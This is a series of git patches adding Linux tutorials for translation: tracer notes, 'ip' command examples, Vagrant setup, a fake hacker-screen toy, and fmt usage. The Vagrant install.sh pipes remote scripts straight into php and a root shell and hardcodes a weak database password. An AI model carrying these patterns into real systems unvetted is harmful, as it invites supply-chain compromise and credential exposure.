+**LTTng** : I've used it a little, but not enough yet to publish anything.
+
+**ktap** : My [ktap Examples][40] page includes one-liners and scripts, although these were for an earlier version.
+
+**dtrace4linux** : I included some examples in my [Systems Performance book][41], and I've developed some small fixes for things in the past, eg, [timestamps][42].
+
+**OL DTrace** : As this is a straight port of DTrace, much of my earlier DTrace work should be relevant (too many links to list here; search on [my homepage][43]). I may develop some specific tools once this is more complete.
+
+**sysdig** : I contributed the [fileslower][44] and [subsecond offset spectrogram][45] chisels.
+
+**others** : I did write a warning post about [strace][46].
+
+Please, no more tracers! ... If you're wondering why Linux doesn't just have one, or DTrace itself, I answered these in my [From DTrace to Linux][47] talk, starting on [slide 28][48].
+
+Thanks to [Deirdre Straughan][49] for edits, and for creating the tracing ponies (with General Zoi's pony creator).
+
+--------------------------------------------------------------------------------
+
+via: http://www.brendangregg.com/blog/2015-07-08/choosing-a-linux-tracer.html
+
+作者:[Brendan Gregg.][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.brendangregg.com
+[1]:http://www.brendangregg.com/blog/images/2015/tracing_ponies.png
+[2]:http://www.slideshare.net/brendangregg/velocity-2015-linux-perf-tools/105
+[3]:http://www.brendangregg.com/FlameGraphs/cpuflamegraphs.html
+[4]:http://www.brendangregg.com/blog/2015-02-27/linux-profiling-at-netflix.html
+[5]:http://lwn.net/Articles/608497/
+[6]:http://www.brendangregg.com/perf.html
+[7]:http://www.brendangregg.com/blog/2015-06-23/netflix-instance-analysis-requirements.html
+[8]:http://www.brendangregg.com/blog/2015-03-17/linux-performance-analysis-perf-tools.html
+[9]:http://techblog.netflix.com/2015/04/introducing-vector-netflixs-on-host.html
+[10]:https://sourceware.org/git/?p=systemtap.git;a=blob_plain;f=README;hb=HEAD
+[11]:http://www.slideshare.net/brendangregg/velocity-2015-linux-perf-tools
+[12]:http://lwn.net/Articles/370423/
+[13]:https://www.kernel.org/doc/Documentation/trace/ftrace.txt
+[14]:https://perf.wiki.kernel.org/index.php/Main_Page
+[15]:http://www.phoronix.com/scan.php?page=news_item&px=BPF-Understanding-Kernel-VM
+[16]:https://github.com/torvalds/linux/tree/master/samples/bpf
+[17]:https://sourceware.org/systemtap/wiki
+[18]:http://lttng.org/
+[19]:http://ktap.org/
+[20]:https://github.com/dtrace4linux/linux
+[21]:http://docs.oracle.com/cd/E37670_01/E38608/html/index.html
+[22]:http://www.sysdig.org/
+[23]:http://www.brendangregg.com/blog/2014-07-13/linux-ftrace-function-counting.html
+[24]:http://www.brendangregg.com/blog/2014-07-16/iosnoop-for-linux.html
+[25]:http://www.brendangregg.com/blog/2014-07-25/opensnoop-for-linux.html
+[26]:http://www.brendangregg.com/blog/2014-07-28/execsnoop-for-linux.html
+[27]:http://www.brendangregg.com/blog/2014-09-06/linux-ftrace-tcp-retransmit-tracing.html
+[28]:http://www.brendangregg.com/blog/2015-06-28/linux-ftrace-uprobe.html
+[29]:http://www.brendangregg.com/blog/2015-07-03/hacking-linux-usdt-ftrace.html
+[30]:http://www.brendangregg.com/blog/2014-06-22/perf-cpu-sample.html
+[31]:http://www.brendangregg.com/blog/2014-06-29/perf-static-tracepoints.html
+[32]:http://www.brendangregg.com/blog/2014-07-01/perf-heat-maps.html
+[33]:http://www.brendangregg.com/blog/2014-07-03/perf-counting.html
+[34]:http://www.brendangregg.com/blog/2014-09-11/perf-kernel-line-tracing.html
+[35]:http://www.brendangregg.com/blog/2015-02-26/linux-perf-off-cpu-flame-graph.html
+[36]:http://www.brendangregg.com/blog/2015-05-15/ebpf-one-small-step.html
+[37]:https://github.com/brendangregg/BPF-tools
+[38]:http://dtrace.org/blogs/brendan/2011/10/15/using-systemtap/
+[39]:https://github.com/brendangregg/systemtap-lwtools
+[40]:http://www.brendangregg.com/ktap.html
+[41]:http://www.brendangregg.com/sysperfbook.html
+[42]:https://github.com/dtrace4linux/linux/issues/55
+[43]:http://www.brendangregg.com
+[44]:https://github.com/brendangregg/sysdig/commit/d0eeac1a32d6749dab24d1dc3fffb2ef0f9d7151
+[45]:https://github.com/brendangregg/sysdig/commit/2f21604dce0b561407accb9dba869aa19c365952
+[46]:http://www.brendangregg.com/blog/2014-05-11/strace-wow-much-syscall.html
+[47]:http://www.brendangregg.com/blog/2015-02-28/from-dtrace-to-linux.html
+[48]:http://www.slideshare.net/brendangregg/from-dtrace-to-linux/28
+[49]:http://www.beginningwithi.com/
From 283f6979a610772a5368f7da3ba81ca89f9ea62b Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:39:59 +0800
Subject: [PATCH 047/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2012=20ip=20Command?=
=?UTF-8?q?=20Examples=20for=20Linux=20Users?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... 12 ip Command Examples for Linux Users.md | 196 ++++++++++++++++++
1 file changed, 196 insertions(+)
create mode 100644 sources/tech/20170915 12 ip Command Examples for Linux Users.md
diff --git a/sources/tech/20170915 12 ip Command Examples for Linux Users.md b/sources/tech/20170915 12 ip Command Examples for Linux Users.md
new file mode 100644
index 0000000000..ded3be8f3b
--- /dev/null
+++ b/sources/tech/20170915 12 ip Command Examples for Linux Users.md
@@ -0,0 +1,196 @@
+translating by lujun9972
+12 ip Command Examples for Linux Users
+======
+For years & years we have been using the '**ifconfig**' command to perform network-related tasks like checking network interfaces or configuring them. But 'ifconfig' is no longer being maintained & has been deprecated in recent versions of Linux. The 'ifconfig' command has been replaced with the '**ip**' command.
+
+The 'ip' command is somewhat similar to the 'ifconfig' command, but it's much more powerful, with many more functionalities attached to it. The 'ip' command is able to perform several tasks that were not possible with the 'ifconfig' command.
+
+[![IP-command-examples-Linux][1]![IP-command-examples-Linux][2]][3]
+
+In this tutorial, we are going to discuss 12 most common uses for 'ip' command, so let's get going,
+
+#### Example 1: Checking network information for interfaces ( LAN Cards )
+
+To check network information like the IP address, subnet, etc. for the interfaces, use the 'ip addr show' command
+```
+[linuxtechi@localhost]$ ip addr show
+
+or
+
+[linuxtechi@localhost]$ ip a s
+```
+
+This will show network information related to all interfaces available on our system, but if we want to view the same information for a single interface, the command is
+```
+[linuxtechi@localhost]$ ip addr show enp0s3
+```
+
+where enp0s3 is the name of the interface.
+
+[![IP-addr-show-commant-output][1]![IP-addr-show-commant-output][4]][5]
+
+#### Example 2: Enabling & disabling a network interface
+
+To enable a disabled network interface, the 'ip' command used is
+```
+[linuxtechi@localhost]$ sudo ip link set enp0s3 up
+```
+
+& to disable the network interface we will use 'down' trigger,
+```
+[linuxtechi@localhost]$ sudo ip link set enp0s3 down
+```
+
+#### Example 3: Assigning IP address & other network information to an interface
+
+To assign IP address to interface, we will use
+```
+[linuxtechi@localhost]$ sudo ip addr add 192.168.0.50/255.255.255.0 dev enp0s3
+```
+
+We can also set broadcast address to interface with 'ip' command. By default no broadcast address is set, so to set a broadcast address command is
+```
+[linuxtechi@localhost]$ sudo ip addr add broadcast 192.168.0.255 dev enp0s3
+```
+
+We can also set standard broadcast address along with IP address by using the following command,
+```
+[linuxtechi@localhost]$ sudo ip addr add 192.168.0.10/24 brd + dev enp0s3
+```
+
+As shown in the above example, we can also use 'brd' in place of 'broadcast' to set the broadcast IP address.
+
+#### Example 4: Removing IP address from interface
+
+If we want to flush or remove the assigned IP from an interface, use the following ip command
+```
+[linuxtechi@localhost]$ sudo ip addr del 192.168.0.10/24 dev enp0s3
+```
+
+#### Example 5: Adding an Alias for an interface (enp0s3)
+
+To add an alias i.e. assign more than one IP to an interface, execute below command
+```
+[linuxtechi@localhost]$ sudo ip addr add 192.168.0.20/24 dev enp0s3 label enp0s3:1
+```
+
+[![ip-command-add-alias-linux][1]![ip-command-add-alias-linux][6]][7]
+
+#### Example 6: Checking route or default gateway information
+
+Checking routing information shows us the route a packet will take to reach the destination. To check the network routing information, execute the following command,
+```
+[linuxtechi@localhost]$ ip route show
+```
+
+[![ip-route-command-output][1]![ip-route-command-output][8]][9]
+
+In the output we will see the routing information for packets for all the network interfaces. We can also get the routing information to a particular ip using,
+```
+[linuxtechi@localhost]$ sudo ip route get 192.168.0.1
+```
+
+#### Example 7: Adding a static route
+
+If we want to change the default route taken by packets, we can do so with the ip command. To assign a default gateway, use the following 'ip route' command
+```
+[linuxtechi@localhost]$ sudo ip route add default via 192.168.0.150
+```
+
+So now all network packets will travel via 192.168.0.150 as opposed to the old default route. To add a static route to a specific destination via a particular gateway & interface, execute
+```
+[linuxtechi@localhost]$ sudo ip route add 172.16.32.32 via 192.168.0.150 dev enp0s3
+```
+
+#### Example 8: Removing a static route
+
+To remove a previously added static route, open a terminal & run,
+```
+[linuxtechi@localhost]$ sudo ip route del 172.16.32.32
+```
+
+**Note:-** Changes made to the routes using the above-mentioned commands are only temporary & will be lost after the system is restarted. To make a persistent route change, we need to modify/create the route-enp0s3 file & add the following line to it, as demonstrated below
+```
+[linuxtechi@localhost]$ sudo vi /etc/sysconfig/network-scripts/route-enp0s3
+
+172.16.32.32 via 192.168.0.150 dev enp0s3
+```
+
+Save and Exit the file.
+
+If you are using Ubuntu or a Debian-based OS, then the file to edit is ' **/etc/network/interfaces** '; add the route "ip route add 172.16.32.32 via 192.168.0.150 dev enp0s3" there, typically as an 'up' directive inside the interface stanza, as shown in the sketch below.
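+
+A hedged sketch of what such a stanza might look like (the interface name, addresses, and route are this article's example values; adapt them to your existing configuration):
+```
+auto enp0s3
+iface enp0s3 inet static
+    address 192.168.0.10
+    netmask 255.255.255.0
+    gateway 192.168.0.150
+    # add the static route whenever the interface comes up
+    up ip route add 172.16.32.32 via 192.168.0.150 dev enp0s3
+```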
+
+#### Example 9: Checking all ARP entries
+
+ARP, short for ' **Address Resolution Protocol** ', is used to convert an IP address to a physical address (also known as a MAC address), & all the IPs and their corresponding MAC details are stored in a table known as the ARP cache.
+
+To view entries in ARP cache i.e. MAC addresses of the devices connected in LAN, the IP command used is
+```
+[linuxtechi@localhost]$ ip neigh
+```
+
+[![ip-neigh-command-linux][1]![ip-neigh-command-linux][10]][11]
+
+#### Example 10: Modifying ARP entries
+
+To delete an ARP entry, the command used is
+```
+[linuxtechi@localhost]$ sudo ip neigh del 192.168.0.106 dev enp0s3
+```
+
+or if we want to add a new entry to ARP cache, the command is
+```
+[linuxtechi@localhost]$ sudo ip neigh add 192.168.0.150 lladdr 33:1a:75:37:e3:84 dev enp0s3 nud perm
+```
+
+where **nud** means **neighbour state** , it can be
+
+ * **perm** - permanent & can only be removed by administrator,
+ * **noarp** - entry is valid but can be removed after lifetime expires,
+ * **stale** - entry is valid but suspicious,
+ * **reachable** - entry is valid until timeout expires.
+
+
+
+#### Example 11: Checking network statistics
+
+With 'ip' command we can also view the network statistics like bytes and packets transferred, errors or dropped packets etc for all the network interfaces. To view network statistics, use ' **ip -s link** ' command
+```
+[linuxtechi@localhost]$ ip -s link
+```
+
+[![ip-s-command-linux][1]![ip-s-command-linux][12]][13]
+
+#### Example 12: How to get help
+
+If you want to find an option that is not listed in the above examples, you can look at the built-in help. In fact, you can use help for all the subcommands. To list all available options that can be used with the 'ip' command, use
+```
+[linuxtechi@localhost]$ ip help
+```
+
+Remember that the 'ip' command is a very important command for Linux admins and should be learned and mastered to configure networks with ease. That's it for now; please do provide your suggestions & leave your queries in the comment box below.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linuxtechi.com/ip-command-examples-for-linux-users/
+
+作者:[Pradeep Kumar][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linuxtechi.com/author/pradeep/
+[1]:https://www.linuxtechi.com/wp-content/plugins/lazy-load/images/1x1.trans.gif
+[2]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg
+[3]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg ()
+[4]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg
+[5]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg ()
+[6]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg
+[7]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg ()
+[8]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg
+[9]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg ()
+[10]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg
+[11]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg ()
+[12]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg
+[13]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg ()
From fbb1d4cefa0020465843a1d8713d595cfd0ee039 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:42:54 +0800
Subject: [PATCH 048/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Instal?=
=?UTF-8?q?l=20And=20Setup=20Vagrant?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...170915 How To Install And Setup Vagrant.md | 265 ++++++++++++++++++
1 file changed, 265 insertions(+)
create mode 100644 sources/tech/20170915 How To Install And Setup Vagrant.md
diff --git a/sources/tech/20170915 How To Install And Setup Vagrant.md b/sources/tech/20170915 How To Install And Setup Vagrant.md
new file mode 100644
index 0000000000..1e76600595
--- /dev/null
+++ b/sources/tech/20170915 How To Install And Setup Vagrant.md
@@ -0,0 +1,265 @@
+How To Install And Setup Vagrant
+======
+Vagrant is a powerful tool when it comes to virtual machines. Here we will look at how to set up and use Vagrant with VirtualBox on Ubuntu to provision reproducible virtual machines.
+
+## Virtual Machines, not all that complex
+
+For years, developers have been using virtual machines as part of their workflow, allowing them to swap and change the environments that their software runs in. This is generally to prevent conflicts between projects, such as project A needing PHP 5.3 and project B needing PHP 5.4.
+
+Also, using virtual machines means you only ever need the computer you're working on; you don't need dedicated hardware to mirror the production environment.
+
+It also comes in handy when multiple developers are working on one project: they can all run an environment that contains all of its requirements. But it can be hard maintaining multiple machines and ensuring they all have the same versions of all the requirements, and this is where Vagrant comes in.
+
+### The benefits of using Virtual Machines
+
+ * Your VM is separate from your host environment
+ * You can have a VM tailored to the requirements of your code
+ * Anything done in one VM does not affect another VM
+ * You can run programs in a VM which your host may not be able to run, such as running some Windows-only software in a Windows VM on top of Ubuntu
+
+
+
+## What is Vagrant
+
+In short, it's a tool that works with VirtualBox to allow you to automate the creation and removal of virtual machines.
+
+It revolves around a config file called the Vagrantfile, which tells Vagrant what version of which OS you want to install, along with some other options such as the IP and directory syncing. You can also add a provisioning script of commands to run on the virtual machine.
+
+By sharing this Vagrantfile around, all developers on a project will be using the exact same virtual machine.
+
+## Installing the Requirements
+
+### Install VirtualBox
+
+VirtualBox is the program which will run the Virtual Machine and is available in the Ubuntu Repos
+```
+sudo apt-get install virtualbox
+```
+
+### Install Vagrant
+
+For Vagrant itself, you need to head to the Vagrant downloads page and install the package for your OS.
+
+### Install Guest Additions
+
+If you intend to share any folders with the virtual machine, you need to install the following plugin.
+```
+vagrant plugin install vagrant-vbguest
+```
+
+## Setting Up Vagrant
+
+### First we need to create an area for vagrant setups.
+```
+mkdir ~/Vagrant/test-vm
+cd ~/Vagrant/test-vm
+```
+
+### Create the VagrantFile
+```
+vagrant init
+```
+
+### Start the Virtual Machine
+```
+vagrant up
+```
+
+### Login to the Machine
+```
+vagrant ssh
+```
+
+By this point you will have a basic Vagrant box running, and a file called Vagrantfile.
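+
+A few other day-to-day commands are worth knowing at this point (these are standard Vagrant CLI commands, not specific to this tutorial):
+```
+vagrant status              # show the state of the machine
+vagrant halt                # shut the machine down
+vagrant reload --provision  # restart the machine and re-run provisioning
+vagrant destroy             # delete the machine entirely
+```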
+
+## Customising
+
+The VagrantFile created in the steps above will look similar to the following
+
+**VagrantFile**
+
+```
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+# All Vagrant configuration is done below. The "2" in Vagrant.configure
+# configures the configuration version (we support older styles for
+# backwards compatibility). Please don't change it unless you know what
+# you're doing.
+Vagrant.configure("2") do |config|
+ # The most common configuration options are documented and commented below.
+ # For a complete reference, please see the online documentation at
+ # https://docs.vagrantup.com.
+
+ # Every Vagrant development environment requires a box. You can search for
+ # boxes at https://vagrantcloud.com/search.
+ config.vm.box = "base"
+
+ # Disable automatic box update checking. If you disable this, then
+ # boxes will only be checked for updates when the user runs
+ # `vagrant box outdated`. This is not recommended.
+ # config.vm.box_check_update = false
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine. In the example below,
+ # accessing "localhost:8080" will access port 80 on the guest machine.
+ # NOTE: This will enable public access to the opened port
+ # config.vm.network "forwarded_port", guest: 80, host: 8080
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine and only allow access
+ # via 127.0.0.1 to disable public access
+ # config.vm.network "forwarded_port", guest: 80, host: 8080, host_ip: "127.0.0.1"
+
+ # Create a private network, which allows host-only access to the machine
+ # using a specific IP.
+ # config.vm.network "private_network", ip: "192.168.33.10"
+
+ # Create a public network, which generally matched to bridged network.
+ # Bridged networks make the machine appear as another physical device on
+ # your network.
+ # config.vm.network "public_network"
+
+ # Share an additional folder to the guest VM. The first argument is
+ # the path on the host to the actual folder. The second argument is
+ # the path on the guest to mount the folder. And the optional third
+ # argument is a set of non-required options.
+ # config.vm.synced_folder "../data", "/vagrant_data"
+
+ # Provider-specific configuration so you can fine-tune various
+ # backing providers for Vagrant. These expose provider-specific options.
+ # Example for VirtualBox:
+ #
+ # config.vm.provider "virtualbox" do |vb|
+ # # Display the VirtualBox GUI when booting the machine
+ # vb.gui = true
+ #
+ # # Customize the amount of memory on the VM:
+ # vb.memory = "1024"
+ # end
+ #
+ # View the documentation for the provider you are using for more
+ # information on available options.
+
+ # Enable provisioning with a shell script. Additional provisioners such as
+ # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+ # documentation for more information about their specific syntax and use.
+ # config.vm.provision "shell", inline: <<-SHELL
+ # apt-get update
+ # apt-get install -y apache2
+ # SHELL
+end
+```
+
+Now, this Vagrantfile will create the basic virtual machine. But the concept behind Vagrant is to have the virtual machines set up for our specific tasks, so let's remove the comments and tweak the config.
+
+**VagrantFile**
+```
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+Vagrant.configure("2") do |config|
+ # Set the Linux Version to Debian Jessie
+ config.vm.box = "debian/jessie64"
+ # Set the IP of the Box
+ config.vm.network "private_network", ip: "192.168.33.10"
+ # Sync Our Projects Directory with the WWW directory
+ config.vm.synced_folder "~/Projects", "/var/www/"
+ # Run the following to Provision
+ config.vm.provision "shell", path: "install.sh"
+end
+```
+
+Now we have a simple Vagrantfile, which sets the box to Debian Jessie, sets an IP for us to use, syncs the folders we are interested in, and finally runs an install.sh, which is where our shell commands can go.
+
+**install.sh**
+```
+#! /usr/bin/env bash
+# Variables
+DBHOST=localhost
+DBNAME=dbname
+DBUSER=dbuser
+DBPASSWD=test123
+
+echo "[ Provisioning machine ]"
+echo "1) Update APT..."
+apt-get -qq update
+
+echo "1) Install Utilities..."
+apt-get install -y tidy pdftk curl xpdf imagemagick openssl vim git
+
+echo "2) Installing Apache..."
+apt-get install -y apache2
+
+echo "3) Installing PHP and packages..."
+apt-get install -y php5 libapache2-mod-php5 libssh2-php php-pear php5-cli php5-common php5-curl php5-dev php5-gd php5-imagick php5-imap php5-intl php5-mcrypt php5-memcached php5-mysql php5-pspell php5-xdebug php5-xmlrpc
+#php5-suhosin-extension, php5-mysqlnd
+
+echo "4) Installing MySQL..."
+debconf-set-selections <<< "mysql-server mysql-server/root_password password $DBPASSWD"
+debconf-set-selections <<< "mysql-server mysql-server/root_password_again password $DBPASSWD"
+apt-get install -y mysql-server
+mysql -uroot -p$DBPASSWD -e "CREATE DATABASE $DBNAME"
+mysql -uroot -p$DBPASSWD -e "grant all privileges on $DBNAME.* to '$DBUSER'@'localhost' identified by '$DBPASSWD'"
+
+echo "5) Generating self signed certificate..."
+mkdir -p /etc/ssl/localcerts
+openssl req -new -x509 -days 365 -nodes -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out /etc/ssl/localcerts/apache.pem -keyout /etc/ssl/localcerts/apache.key
+chmod 600 /etc/ssl/localcerts/apache*
+
+echo "6) Setup Apache..."
+a2enmod rewrite
+> /etc/apache2/sites-enabled/000-default.conf
+echo "
+
+ ServerAdmin [[email protected]][1]
+ DocumentRoot /var/www/
+ ErrorLog ${APACHE_LOG_DIR}/error.log
+ CustomLog ${APACHE_LOG_DIR}/access.log combined
+
+
+" >> /etc/apache2/sites-enabled/000-default.conf
+service apache2 restart
+
+echo "7) Composer Install..."
+curl --silent https://getcomposer.org/installer | php
+mv composer.phar /usr/local/bin/composer
+
+echo "8) Install NodeJS..."
+curl -sL https://deb.nodesource.com/setup_6.x | sudo -E bash -
+apt-get -qq update
+apt-get -y install nodejs
+
+echo "9) Install NPM Packages..."
+npm install -g gulp gulp-cli
+
+echo "Provisioning Completed"
+```
+
+By having the above Vagrantfile and install.sh in your directory, running vagrant up will do the following:
+
+ * Create a virtual machine using Debian Jessie
+ * Set the machine's IP to 192.168.33.10
+ * Sync ~/Projects with /var/www/
+ * Install and set up Apache, MySQL, PHP, Git, and Vim
+ * Install and run Composer
+ * Install Node.js and gulp
+ * Create a MySQL database
+ * Create self-signed certificates
+
+
+
+By sharing the VagrantFile and install.sh with others, you can work on the exact same environment, on two different machines.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.chris-shaw.com/blog/how-to-install-and-setup-vagrant
+
+作者:[Christopher Shaw][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.chris-shaw.com
+[1]:/cdn-cgi/l/email-protection
From 8ef49bbb23c0e812bc425a23400b5965d0b62ed8 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:45:14 +0800
Subject: [PATCH 049/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Fake=20A=20Hollyw?=
=?UTF-8?q?ood=20Hacker=20Screen=20in=20Linux=20Terminal?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...llywood Hacker Screen in Linux Terminal.md | 72 +++++++++++++++++++
1 file changed, 72 insertions(+)
create mode 100644 sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
diff --git a/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md b/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
new file mode 100644
index 0000000000..f826ac57f0
--- /dev/null
+++ b/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
@@ -0,0 +1,72 @@
+Fake A Hollywood Hacker Screen in Linux Terminal
+======
+**Brief: This tiny tool turns your Linux terminal into a Hollywood style real time hacking scene.**
+
+![Hollywood hacking terminal in Linux][1]
+
+I am in!
+
+You might have heard this dialogue in almost every Hollywood movie that shows a hacking scene. There will be a dark terminal with ASCII text, diagrams, and hex code changing continuously, and a hacker who is hitting the keyboard as if he/she is typing an angry forum response.
+
+But that's Hollywood! Hackers break into a network system in minutes whereas it takes months of research to actually do that. But I'll put the Hollywood hacking criticism aside for the moment.
+
+Because we are going to do the same. We are going to pretend like a hacker in Hollywood style.
+
+There's this tiny tool that runs a script turning your Linux terminal into a Hollywood style real time hacking terminal:
+
+Like what you see? It even plays the Mission Impossible theme music in the background. Moreover, you get a new, randomly generated hacking terminal each time you run this tool.
+
+Let's see how to become a Hollywood hacker in 30 seconds.
+
+### How to install Hollywood hacking terminal in Linux
+
+The tool is quite aptly called Hollywood. Basically, it runs in Byobu, a text-based window manager, and it creates a random number of randomly sized split windows and runs a noisy text app in each of them.
+
+[Byobu][2] is an interesting tool developed by Dustin Kirkland of Ubuntu. More about it in some other article. Let's focus on installing this tool.
+
+Ubuntu users can install Hollywood using this simple command:
+```
+sudo apt install hollywood
+```
+
+If the above command doesn't work in your Ubuntu or other Ubuntu based Linux distributions such as Linux Mint, elementary OS, Zorin OS, Linux Lite etc, you may use the below PPA:
+```
+sudo apt-add-repository ppa:hollywood/ppa
+sudo apt-get update
+sudo apt-get install byobu hollywood
+```
+
+You can also get the source code of Hollywood from its GitHub repository:
+
+[Hollywood on GitHub][3]
+
+Once installed, you can run it using the command below, no sudo required:
+
+`hollywood`
+
+As it runs Byobu first, you'll have to use Ctrl+C twice and then use the `exit` command to stop the hacking terminal script.
+
+Here's a video of the fake Hollywood hacking. Do [subscribe to our YouTube channel][4] for more Linux fun videos.
+
+It's a fun little tool that you can use to amaze your friends, family, and colleagues. Maybe you can even impress girls in the bar though I don't think it is going to help you a lot in that field.
+
+And if you liked Hollywood hacking terminal, perhaps you would like to check another tool that gives [Sneaker movie effect in Linux terminal][5].
+
+If you know more such fun utilities, do share with us in the comment section below.
+
+--------------------------------------------------------------------------------
+
+via: https://itsfoss.com/hollywood-hacker-screen/
+
+作者:[Abhishek Prakash][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://itsfoss.com/author/abhishek/
+[1]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/hollywood-hacking-linux-terminal.jpg
+[2]:http://byobu.co/
+[3]:https://github.com/dustinkirkland/hollywood
+[4]:https://www.youtube.com/c/itsfoss?sub_confirmation=1
+[5]:https://itsfoss.com/sneakers-movie-effect-linux/
From 04aeaa218e6dff587161b85734402037f82f6952 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:50:17 +0800
Subject: [PATCH 050/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20fmt=20com?=
=?UTF-8?q?mand=20-=20usage=20and=20examples?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Linux fmt command - usage and examples.md | 93 +++++++++++++++++++
1 file changed, 93 insertions(+)
create mode 100644 sources/tech/20170918 Linux fmt command - usage and examples.md
diff --git a/sources/tech/20170918 Linux fmt command - usage and examples.md b/sources/tech/20170918 Linux fmt command - usage and examples.md
new file mode 100644
index 0000000000..19d0452d96
--- /dev/null
+++ b/sources/tech/20170918 Linux fmt command - usage and examples.md
@@ -0,0 +1,93 @@
+translating by lujun9972
+Linux fmt command - usage and examples
+======
+
+Sometimes you may find yourself in a situation wherein the requirement is to format the contents of a text file. For example, the text file contains one word per line, and the task is to format all the words into a single line. Of course, this can be done manually, but not everyone likes doing time-consuming stuff manually. Plus, that's just one use case - the requirement could be anything.
+
+Gladly, there exists a command that can cater to at least some of these text formatting requirements. The tool in question is dubbed **fmt**. In this tutorial, we will discuss the basics of fmt, as well as some of the main features it provides. Please note that all commands and instructions mentioned here have been tested on Ubuntu 16.04 LTS.
+
+### Linux fmt command
+
+The fmt command is a simple text formatting tool available to users of the Linux command line. Following is its basic syntax:
+
+fmt [-WIDTH] [OPTION]... [FILE]...
+
+And here's how the man page describes it:
+
+Reformat each paragraph in the FILE(s), writing to standard output. The option -WIDTH is an abbreviated form of --width=DIGITS.
+
+Following are some Q&A-styled examples that should give you a good idea about fmt's usage.
+
+### Q1. How to format contents of file in single line using fmt?
+
+That's what the fmt command does when used in its basic form (sans any options). You only need to pass the filename as an argument.
+
+fmt [file-name]
+
+The following screenshot shows the command in action:
+
+[![format contents of file in single line][1]][2]
+
+So you can see that multiple lines in the file were formatted in a way that everything got clubbed up in a single line. Please note that the original file (file1 in this case) remains unaffected.
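+
+To make that concrete, here is a small hypothetical example (the file name and its contents are just for illustration); fmt joins the lines of a paragraph and fills them up to the default width of 75 columns:
+```
+$ cat file1
+hello
+world
+from
+fmt
+$ fmt file1
+hello world from fmt
+```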
+
+### Q2. How to change maximum line width?
+
+By default, the maximum width of a line that fmt command produces in output is 75. However, if you want, you can change that using the **-w** command line option, which requires a numerical value representing the new limit.
+
+fmt -w [n] [file-name]
+
+Here's an example where width was reduced to 20:
+
+[![change maximum line width][3]][4]
+
+### Q3. How to make fmt highlight the first line?
+
+This can be done by making the indentation of the first line different from the rest, something which you can do by using the **-t** command line option.
+
+fmt -t [file-name]
+
+[![make fmt highlight the first line][5]][6]
+
+### Q4. How to make fmt split long lines?
+
+The fmt command is capable of splitting long lines as well, a feature which you can access using the **-s** command line option.
+
+fmt -s [file-name]
+
+Here's an example of this option:
+
+[![make fmt split long lines][7]][8]
+
+### Q5. How to have separate spacing for words and lines?
+
+The fmt command offers a **-u** option, which ensures one space between words and two between sentences. Here's how you can use it:
+
+fmt -u [file-name]
+
+Note that this feature was enabled by default in our case.
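+
+As a small hypothetical illustration of uniform spacing (the sample file and output below are assumptions, not from the original article):
+```
+$ cat file2
+Hello   world.  This is    a   test.
+$ fmt -u file2
+Hello world.  This is a test.
+```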
+
+### Conclusion
+
